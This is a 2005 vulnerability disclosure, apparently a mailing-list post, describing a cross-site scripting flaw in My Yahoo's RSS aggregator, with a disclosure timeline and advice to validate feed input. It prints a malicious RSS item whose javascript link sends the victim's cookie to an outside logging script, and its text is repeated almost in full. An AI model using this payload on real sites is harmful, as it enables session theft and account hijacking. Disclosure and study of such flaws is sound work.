alljer@gmail.com
18/10/05, 00:05
I recently began running some testing and discovered that when Yahoo's RSS Aggregator allows a person to add an RSS feed to It’s website, it doesn't properly check the XML file to make sure it doesn't contain possibly malicious code.
Full Document: http://www.alljer.com/yahoorssxss.htm
A malicious website could have a Add to My Yahoo button like the following: http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif with a link to the malicious XML file such as the following:
http://add.my.yahoo.com/rss?url=http://www.alljer.com/yahooxss.xml It could be disguised with javascript to look like a link to add a valid CNN feed. The malicious links could also be made to look like real headlines, or even grab headlines from CNN's RSS
and replace the links with malicious code.
If you use the link you can see that by clicking the "Steal My Cookie" it would do just that. Clicking "Show My Cookie" will also simply show the cookie.
The malicious RSS feed is below:
<item>
<title>Steal My Cookie!</title>
<link>javascript:document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie;</link>
<description>Should Steal Your Cookie.</description>
<pubDate>Tue, 20 Sep 2005 23:55:18 EDT</pubDate>
</item>
<item>
<title>Show My Cookie!</title>
<link>javascript:alert(document.cookie);</link>
<description>Should Steal Your Cookie.</description>
<pubDate>Tue, 20 Sep 2005 23:55:18 EDT</pubDate>
</item>
The following is a screen shot of My Yahoo! with the injected code: http://www.alljer.com/yahooxss.jpg
This XSS can be even more dangerous when combined with recent security bugs found in the way AJAX is handled by certain browsers. ( http://secunia.com/advisories/16942/ ) And with the recent spreading of an XSS AJAX worm on MySpace it's critical for sites
to validate all input being displayed on it's site through any means. ( http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391 ) There would be very little to keep someone from creating a similar worm that attacked My Yahoo memb
ers. It could be used to construct a massive phishing attack on Yahoo by loading a login page through AJAX and modifying it's post location, all while still running off the my.yahoo.com domain.
Yahoo was contacted about this vulnerability first on the 21st of September, and again on the 12th of October, giving a final cut off date of Oct 17th before going public with this information. No correspondence was received.
I was also able to wage this XSS attack against My.Msn.Com but it was resolved. I'm sure a few other sites that allow for a user to add an RSS feed are also vulnerable. Google's RSS aggregator on the other hand does not work with this attack.
Like any other method of displaying content from another site on your site, it is always best to validate this input. Even if the RSS feed you are displaying may be from a reputable source, trusting them implicitly to not have malicious code in the RSS st
ream would not be a wise idea.
Questions or comments contact me:
alljer@gmail.com
Jeremy Moeder
http://www.alljer.com/yahoorssxss.htm
Full Document: http://www.alljer.com/yahoorssxss.htm
A malicious website could have a Add to My Yahoo button like the following: http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif with a link to the malicious XML file such as the following:
http://add.my.yahoo.com/rss?url=http://www.alljer.com/yahooxss.xml It could be disguised with javascript to look like a link to add a valid CNN feed. The malicious links could also be made to look like real headlines, or even grab headlines from CNN's RSS
and replace the links with malicious code.
If you use the link you can see that by clicking the "Steal My Cookie" it would do just that. Clicking "Show My Cookie" will also simply show the cookie.
The malicious RSS feed is below:
<item>
<title>Steal My Cookie!</title>
<link>javascript:document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie;</link>
<description>Should Steal Your Cookie.</description>
<pubDate>Tue, 20 Sep 2005 23:55:18 EDT</pubDate>
</item>
<item>
<title>Show My Cookie!</title>
<link>javascript:alert(document.cookie);</link>
<description>Should Steal Your Cookie.</description>
<pubDate>Tue, 20 Sep 2005 23:55:18 EDT</pubDate>
</item>
The following is a screen shot of My Yahoo! with the injected code: http://www.alljer.com/yahooxss.jpg
This XSS can be even more dangerous when combined with recent security bugs found in the way AJAX is handled by certain browsers. ( http://secunia.com/advisories/16942/ ) And with the recent spreading of an XSS AJAX worm on MySpace it's critical for sites
to validate all input being displayed on it's site through any means. ( http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391 ) There would be very little to keep someone from creating a similar worm that attacked My Yahoo memb
ers. It could be used to construct a massive phishing attack on Yahoo by loading a login page through AJAX and modifying it's post location, all while still running off the my.yahoo.com domain.
Yahoo was contacted about this vulnerability first on the 21st of September, and again on the 12th of October, giving a final cut off date of Oct 17th before going public with this information. No correspondence was received.
I was also able to wage this XSS attack against My.Msn.Com but it was resolved. I'm sure a few other sites that allow for a user to add an RSS feed are also vulnerable. Google's RSS aggregator on the other hand does not work with this attack.
Like any other method of displaying content from another site on your site, it is always best to validate this input. Even if the RSS feed you are displaying may be from a reputable source, trusting them implicitly to not have malicious code in the RSS st
ream would not be a wise idea.
Questions or comments contact me:
alljer@gmail.com
Jeremy Moeder
http://www.alljer.com/yahoorssxss.htm